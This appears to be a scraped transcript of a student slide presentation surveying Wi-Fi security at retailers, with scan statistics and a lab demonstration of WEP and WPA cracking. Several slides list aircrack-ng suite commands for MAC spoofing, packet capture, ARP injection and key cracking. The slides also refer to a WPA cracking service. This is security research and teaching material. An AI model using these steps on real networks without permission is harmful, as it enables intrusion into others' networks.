Presentation is loading. Please wait.

Presentation is loading. Please wait.

An Empirical Study on Wireless Network Security for Retailers Khai Tran.

Published by Modified over 10 years ago

Similar presentations

Presentation on theme: "An Empirical Study on Wireless Network Security for Retailers Khai Tran."— Presentation transcript:

1 An Empirical Study on Wireless Network Security for Retailers Khai Tran

2 Introduction Retail merchants have been incorporating wireless solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins. Apple – wireless handheld devices that provided credit authorization Starbucks – free Wi-Fi access for AT&T customers or those who wish to pay a fee $3.99 for two hours Home Depot – wireless handheld devices are used throughout the store to perform inventory, price changes, and various other tasks. In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.

3 Lowe’s and TJX Lowe’s - 2003 Loosely protected wireless connection in Southfield, MI branch led to intrusion Trio of hackers (Brian Salcedo, Adam Botbyl, Paul Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states TJX - 2005 Two Miami-area Marshalls stores were compromised due to a breach in their unsecured wireless network Intruders had access to millions of credit card numbers due to weak data encryption

4 Purpose Are Retailers Still Using WEP? Goals: Scan wireless networks of retailers to determine if networks are secured and what type of security As a Proof of Concept, setup a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks

5 WEP (Wired Equivalent Privacy) Introduced in 1997 to secure 802.11 wireless networks Several weaknesses detected in 2001 Simple Initialization Vector (IV) 24-bits Repeats after about 5000 packets Single shared key Susceptible to eavesdropping Declared by IEEE in 2004 as failing to meet security requirements

6 WPA/WPA2 (Wifi Protected Access) Introduced in 2003 to replace WEP IV is increased from 24 to 48 bits Re-use of keys is unlikely 256 bit keys as opposed to 128 2^128 Implements TKIP (Temporal Key Integrity Protocol) to support pre- WPA

7 Tools Used for Passive Scans OCZ Neutrino netbook Window XP SP3 Intel Atom (N270) 1.60 GHz, 2.0 GB RAM RealTek RTL8187SE Wireless LAN PCIE WirelessNetView software Created by Nir Sofer Version 1.26 www.nirsoft.net Why was WirelessNetView chosen for passive scans? Cities scanned SacramentoCitrus Heights RosevilleOroville Chico

8 Sample Scan with WirelessNetView

9 Scan Results 65 retail networks were scanned over a period of two weeks Security Less than 17% (11) were still using WEP to secure their network Of the 17%, only three (0.5%) were Big Box retailers while all the others were small local retail shops Most retailers have adopted WPA No Security Just over 26% (17) had no security on their network 13 of these 17 were Big Box retailers

10 What is BackTrack? Created by Mati Aharoni and Max Moser Supported by Linux community www.remote-exploit.org Live Linux distro based on Slackware and available as a Live CD or on USB boot Includes tools such as kismet, metasploit, wireshark Used for pen testing, network security and analysis

11 Tools Used For Cracking Dell Latitude D820 Window XP SP2 Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM Intel PRO/Wireless 3945ABG 2Wire 3800HGV-B Uverse Router WEP, WPA, WPA2 BackTrack version 3 airmon-ng airodump-ng aireplay-ng aircrack-ng macchanger

12 Steps to Cracking WEP Spoof MAC address Turn wireless card into monitoring mode Scan available networks and capture packets Inject ARP-request packets into network to generate traffic Feed data to aircrack-ng for password cracking

13 Check Wireless Driver

14 Spoof MAC Covering your tracks…

15 Search Available Networks #airodump-ng wifi0

16 Capture Packets On Target Network airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0

17 Inject Packets & Attempt to Crack aireplay-ng -3 –b 00:21:7C:4E:89:51 –h 00:11:22:33:44:55 wifi0 aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap

18 WEP Cracking Demonstration Linksys Wireless-G Router (WRT54G) SSID - 693TEST MAC – 00:1D:7E:35:AA:6D

19 Cracking WPA Requires deauthentication from AP and re-authentication

20 WPA-PSK Cracking Service

21 www.wpacracker.com

22 Conclusion Big Box Retailers Most have either adopted WPA to secure their network or provided public portals for user authentication Small & Local Retail Shops A small number are still using WEP or no security at all

23 Afterthoughts Residential Wireless Networks A lot of networks are still using WEP Scan of Nord Ave 182 networks detected 36% (65) are using WEP Out of the 182 networks, 29 are obvious 2WIRE### routers 27 of these are using WEP 2006 survey by A. Bittau, M. Handley, and J. Lackey 400 networks scanned in London 76% WEP, 20% WPA, 4% 802.11i 2,539 networks scanned in Sattle 85% WEP, 14% WPA, 1% 802.11i

24 2WIRE WEP Networks

25 Questions?

26 References Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP?s Coffin," sp, pp.386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006. Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp http://www.starbucks.com/retail/wireless.asp Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241 Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," ares, pp.1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006 Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot- Tackles-Network-Challenge/http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot- Tackles-Network-Challenge/ Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438http://www.securityfocus.com/news/7438 Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/ http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/ Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/http://www.wired.com/threatlevel/2009/07/pci/ Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," services, pp.368-374, 2007 IEEE Congress on Services (Services 2007), 2007 www.nirsoft.net/about_nirsoft_freeware.html http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-Service www.aircrack-ng.org

Download ppt "An Empirical Study on Wireless Network Security for Retailers Khai Tran."

Similar presentations

Overview How to crack WEP and WPA

Overview How to crack WEP and WPA
SECURING WIRELESS LANS PRESENTED BY VICTOR C. NWALA CS555 Department of Computer Science Old Dominion University.

SECURING WIRELESS LANS PRESENTED BY VICTOR C. NWALA CS555 Department of Computer Science Old Dominion University.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
IEEE 802.11i IT443 Broadband Communications Philip MacCabe October 5, 2005

IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005
Crack WPA Lab Last Update 2014.06.11 1.0.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Hacking WLAN // BRUTE FORCE CRACKER // TCP/IP. WLAN HACK Wired Equivalent Privacy (WEP) encryption was designed to protect against casual snooping, but.

Hacking WLAN // BRUTE FORCE CRACKER // TCP/IP. WLAN HACK Wired Equivalent Privacy (WEP) encryption was designed to protect against casual snooping, but.
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
How secure are 802.11b Wireless Networks? By Ilian Emmons University of San Diego.

How secure are b Wireless Networks? By Ilian Emmons University of San Diego.
Final Presentation Presented By: Gal Leibovich Liran Manor Supervisor: Hai Vortman.

Final Presentation Presented By: Gal Leibovich Liran Manor Supervisor: Hai Vortman.
WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.

WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.

Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID 001790660.

1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID
Man in the Middle Paul Box Beatrice Wilds Will Lefevers.

Man in the Middle Paul Box Beatrice Wilds Will Lefevers.
Wireless Router Setup. Internet Cable Internet Cable (Blue) Machine Cable (Yellow) Power Plug (Black) Reset Button (Red)

Wireless Router Setup. Internet Cable Internet Cable (Blue) Machine Cable (Yellow) Power Plug (Black) Reset Button (Red)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.

Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
11 WIRELESS SECURITY by Prof. Russell Jones. WIRELESS COMMUNICATION ISSUES  Wireless connections are becoming popular.  Network data is transmitted.

11 WIRELESS SECURITY by Prof. Russell Jones. WIRELESS COMMUNICATION ISSUES  Wireless connections are becoming popular.  Network data is transmitted.
The Final Nail in WEP’s Coffin Andrea Bittau, Mark Handley – University College London Joshua Lackey - Microsoft CPS372 Gordon College.

The Final Nail in WEP’s Coffin Andrea Bittau, Mark Handley – University College London Joshua Lackey - Microsoft CPS372 Gordon College.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
Wireless Insecurity.

Wireless Insecurity.

Similar presentations

Ads by Google